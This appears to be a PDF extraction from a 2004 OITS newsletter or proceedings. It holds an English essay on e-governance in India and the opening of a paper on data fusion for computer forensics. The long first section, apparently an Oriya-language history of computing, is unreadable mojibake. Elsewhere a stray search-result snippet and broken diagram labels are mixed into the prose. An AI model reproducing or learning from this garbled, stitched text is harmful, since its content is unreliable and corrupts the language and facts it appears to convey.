OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 16: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

12

the peoples representatives rule the countrythrough the Legislative Assembly or Lok Sabha(Parliament) and through the making of peopleor business-friendly laws and citizen-relatedschemes For the first time we tried to link thesepeople because political motivation is imperativefor the e-governance drive in India or anywhereelse in the world All people are directlyconnected with their representative as well as

administration for day-to-day governmentservices or work In this diagram both thepolitical level and administrative level are linkedwith citizens

In the abovementioned concept keeping inmind the reality of a democratic country andPerformance Management and Change Managementwe tried to bring in a new definition for e-Government

Performance Measurement of Government workforce

Change Management

Prime MinisterChief MinisterLocal Representative

Political Will Power

Efficiency in Government

Citizens Confidence in Government for

Better

Better Citizens Services through ICT-e-Government

e-Governance

Administrator

People willChange The Representativeif they do not perform

Citizens Confidence inGovernment for Better

Governance

OITS-2004

13

that is Use of ICT by the Government to providebetter Citizens Centric Services and Applicationthrough performance measurement based onchange management in internal organisationaltransformation set-up that is called e-Government

In other words e-Governance should belinked with the empowerment of everystakeholder along with the economicdevelopment of the country

There are other major issues too Ananalysis of the determinants of successful e-Government programmes shows that the keyfactors are the countries political will thestrength of their human capital theirtelecommunications infrastructure and thepresence of administrative priorities

The United Nations Report develops andpresents a synthetic e-Government index thatreflects and incorporates the countries officialonline presence evaluates theirtelecommunications infrastructure and assessestheir human development capacity In essencethe index reflects the requisite conditions that

constitute an enabling environment for e-Government

Multidimensional approach should beapplied for this kind of initiative that leads toreforms issues e-Government is considered aglobal change programme towards a custom-oriented governmental organisation Atransition of this importance needs clear visionand leadership A recent study on benchmarkingon e-Government projects done by CGEampY hasshown that different kind of e-Governmentprojects in the EU have been translated intomodels with important enablers for the furtherdevelopment of e-Government

These enablers are clustered into thefollowing categories

middot Leadershipmiddot Organisationmiddot Culturemiddot TechnologyA successful e-Government strategy should

contain all elements of the model in a balancedway

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

Customer orientation Communication Partnership

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

Customer orientation Communication Partnership

OITS-2004

14

Enablers for Further e-GovernmentDevelopment

What kind of citizens services are neededmust first be analysed by the government so thataccording to requirements the governmentprovides services at minimum cost with nohassle through proper use of ICT This is thefirst step of e-Governance Government shouldstart performance-based change management inthe internal system for better efficiency andreliability to provide much-needed e-Government services in a manner that isaccountable Goals should be defined first andpriorities should be taken in account

Basic citizens services are considered firstbefore any e-Governance initiative and these canbe centralised with the department and availableonline for citizens and business peopleCitizens BusinessesIncome Taxes Social Contribution

for EmployeesJob Search Corporate TaxSocial Security Benefits VATPersonal Documents Registration of a New

CompanyCar Registration Submission of Data to the

Statistical OfficeApplication for Building Custom DeclarationPermission Declaration to Police Environment-related

PermitsPublic Libraries Public ProcurementBirth and MarriageCertificates Enrolment in HigherEducationAnnouncement of Moving Health-related Services

Sources CAP GEMINI Ernst amp Youngs Onlineavailability of public services Oct 2001Oct 2002

The recent study report by PACIFICCOUNCIL ON INTERNATIONAL POLICYRoadmap for E-Government in the DevelopingWorld has shown that the spread of informationand communication technology brings hope that

the government can transform And indeedforward-looking officials everywhere are usingtechnology to improve their governments workefficiency To recapitulate defined broadly e-Government is the use of ICT to promote moreefficient and effective government facilitate moreaccessible government services allow greaterpublic access to information and makegovernment more accountable to citizens E-Government might involve delivering servicesvia the Internet telephone community centres(self-service or facilitated by others) wirelessdevices or other communications systems

But e-Government is not a shortcut toeconomic development budget savings or cleanefficient government

E-Government is not the Big Bang asingle event that immediately and forever altersthe universe of government

E-Government is a process call it e-volution and often a struggle that presentscosts and risks both financial and political

These risks can be significant If not wellconceived and implemented e-Governmentinitiatives can waste resources fail in theirpromise to deliver useful services and thusincrease public frustration with governmentParticularly in the developing world whereresources are scarce e-Government must targetareas with high chances for success and producewinners

Moreover e-Government in the developingworld must accommodate certain uniqueconditions needs and obstacles These mayinclude a continuing oral tradition lack ofinfrastructure corruption weak educationalsystems and unequal access to technology Toooften the lack of resources and technology iscompounded by a lack of access to expertise andinformation

OITS-2004

15

E-Government success requires changinghow government works how it deals withinformation how officials view their jobs andinteract with the public Achieving e-Government success also requires activepartnerships between government citizens andthe private sector The e-Government processneeds continuous input and feedback from thecustomers the public businesses andofficials who use e-Government services Theirvoices and ideas are essential for making e-Government work When implemented well e-Government is a participatory process

The study group also classified tenremarkable questions for e-Governmentinitiatives in the developing world and if wedefine the entire question in a proper way wewould understand basic problems in e-Government implementation and how we canachieve faster growth in areas of e-Governmentby selecting the right citizen centric services

1 Why are we pursuing e-Government2 Do we have a clear vision and priorities

for e-Government3 What kind of e-Government are we ready

for4 Is there enough political will to lead the

e-Government effort5 Are we selecting e-Government projects

in the best way6 How should we plan and manage e-

Government projects7 How will we overcome resistance from

within the government8 How will we measure and communicate

progress And how will we know if weare failing

9 What should our relationship be with theprivate sector

10 How can e-Government improve citizensparticipation in public affairs

These questions itself give a betterunderstanding and if we define it practicallyaccording to the e-Government project then wecan be champions in e-Government

Above all the government should make aperformance-based index for their humanresources so that in a changed environment thegovernment can measure the performance ofofficersemployees and give them rewardsincentives and promotions on betterperformance Simultaneously the governmentwill also give proper training for a new ITenvironment and new IT solutions for betterservices delivered with KnowledgeManagement Unless and until these criteria arenot used by Government Citizens cant get on-time government services either online or offline

Therefore the government should rethinkand link these management tools in e-governanceenvironment to change the old mindset ofemployees (officials) because technology cantdo everything alone People need transformationin the government as well as the thinking of theperformer who performs the role in the e-Governance initiative Indeed e-Governmentmeans transformation of the government processthrough a series of measurements by applyingnew kinds of methodology and sharing the bestpractices along with knowledge and ideas inthe ICT environment That is the only way torealise our dreams

Raj Kumar Prasad is the Editor of Indian firste-commerce and CEO The Indian Chapter of theCommonwealth Centre for e-Governance and regularspeaker on e-governance and e-commerce worldwide anda thinker for social reform through ICT He is also memberof many world organisations and editorial member of manyInternational journals author can be reached atrajkumarelectronicgovindianet

OITS-2004

16

1 INTRODUCTION

We live in the Information Age and weare consumed by information With the rapiddevelopment of this Digital Information andCommunication Technology (DICT) and theability to conduct business and communicatethrough these revolutionary mediums haspositively impacted upon the social andeconomic well being of the Nation invadingnearly every area of modern life The currentstate-of-the-art of different security systems isrelatively primitive with respect to the recentexplosion in computer communicationscyberspace and electronic commerceOrganizations fully realize that cyberspace is acomplex realm of vital information flows withboth enabling and inhibiting technical factors

APPLICATION OF DATA FUSION IN COMPUTERFORENSICS

Sateesh Pradhan1 amp Suneeta Satpathy2

1 Research Fellow Directorate of Forensic Sciences GEQD Hyd2 Dept of Computer Science and Application Utkal University Bhubaneswar

Since Internet-related legislation is not yetmature and the infrastructure of information andcommunication society is still underconstruction there is always a space for illegalopportunists to commit crime which iscommonly known as Computer Frauds andCyber Crime (CFCC) While information isempowerment the sheer magnitude of theinformation we collect as well as the sensitivityof much of it necessitates that we be cautious inits maintenance storage and protectionIdentifying tracking classifying and assessinghostile and inhibiting activities in this ever-growing complex dimension is an enormous andfascinating technical challenge This is a problemthat has put a major impact in whole worldwideweb in the developed and developing countries

ABSTRACTIn the current age of Digital Information and Communication Technology (DICT) the potential for crushing

availability of data largely without meaning has become a reality Business has become increasingly dependenton the Internet and computing to operate Everywhere the individuals and the organizations are drowning in dataand information and starved for knowledge and understanding This problem has put a major impact worldwidein all the developed and developing countries One of the keys to solve this problem is Data and InformationFusion Data Fusion systems are being proposed for a wide variety of applications around the world by whichmore efficient and cost effective systems can be developed The desire to obtain the maximum benefit fromexpensive sensors and information systems has prompted this interest But the Legal support criminal justicedelivery system and international cooperation have not kept pace with the technological advancements which have takenplace with the advent of information technology Also it has become apparent that there are issues of evidencegathering in a computing environment which by their nature is technical and different to other forms of evidencegathering This paper provides a functional overview of the art and science of multisensor Data Fusion technologyand how it can enhance the performance and reliability of Advanced Security Management Systems and ComputerForensics (CF) and hence extend a further hand to the Law Enforcement and Forensic Investigating Agencies

Keywords Digital Information Technology (DICT) Data Fusion Information Fusion Computer Forensics (CF)Potential Legal Digital Evidence (PLDE)

OITS-2004

17

One of the keys to solve this problem is Dataand Information Fusion The techniques of DataFusion are designed to provide information ofa higher quality than could be obtained by usinga set of sensors independently The no of factorsthat allow the integration of data to be beneficialare

1 Redundancy2 Complementarities3 Timeliness4 Cost of the information

So the Law-Enforcement Agencies has aclear role to protect the informationinfrastructure which is critical to nationalsecurity and protect the public from criminal ormalicious activity occurring through theseelectronic mediums By explaining the nature ofthe vulnerabilities faced by the organizationstoday and discussing the problems this paperoffers an introduction to some of the technicalissues surrounding this new and specializedfield of Data Fusion and its application inComputer Forensics to identify and describesources of evidence to help the Law Enforcementand Forensic Investigating Agencies

2 ELEMENTS AND OBJECTIVES OFCOMPUTER FORENSICS

Computer forensics is the study ofcomputers and networks as they relate to legalprocesses The objective of Computer Forensicsis to learn about computer systems and networksand the information they contain and to do itin such a way that the knowledge can be usedin legal proceedings It is defined as anapplication of computer investigations andanalysis techniques in the interests ofdetermining Potential Legal Digital Evidence

Computer specialists can draw on an arrayof methods for discovering deleted

encrypted or damaged file information(Robbins 1997)

There are four steps in ComputerForensics [3]

1 Identify the evidence2 Preserve the evidence3 Analyze the evidence4 Present the evidence

Objective

1 Recovery Evidence preservation Damage control System restoration

2 Causation (Problem source)3 Proof Evidence Analysis Prove it to prevent future incidents

The tools and processes used in thecollection preservation and analysis ofComputer Forensics evidences are different foreach situation and computer system or network

3 DATA FUSION

Data Fusion is the process of combininginformation from a variety of sensors to producea unified result It can also be defined as a processof combining complementary information frommultiple sensor data to generate a single datathat contains a more accurate description of thescene than any of the individual source dataThe purpose is to merge the data coming fromdifferent information sources and the motivationis to provide information about a scene notobtainable from a single source or to reduce theuncertainty associated with data coming fromsingle source The fusion process ideallygenerates a single composite data that representsall the useful information from a set of data of

OITS-2004

18

different sensors thus removing the problemsinherent in frame-by-frame evaluation andimproves the data interpretation and recognitionby taking advantage of the complementarycharacteristics of different sensors

31 Advantages of Data fusionThe advantages gained through the

synergistic use of multisensory information canbe decomposed into a combination of fourfundamental aspects the redundancycomplementarily timeliness and cost of theinformation which can then be defined as thedegree to which each of these four aspects ispresent in the information provided by thesensors It also provides the following potentials

1Information from multiple viewpoints2 Extended coverage3 Improved accuracy4 Robust and fault-tolerant operation

32 Application and Potential opportunities ofData Fusion in Computer Forensics

Application of Data Fusion in variousfields

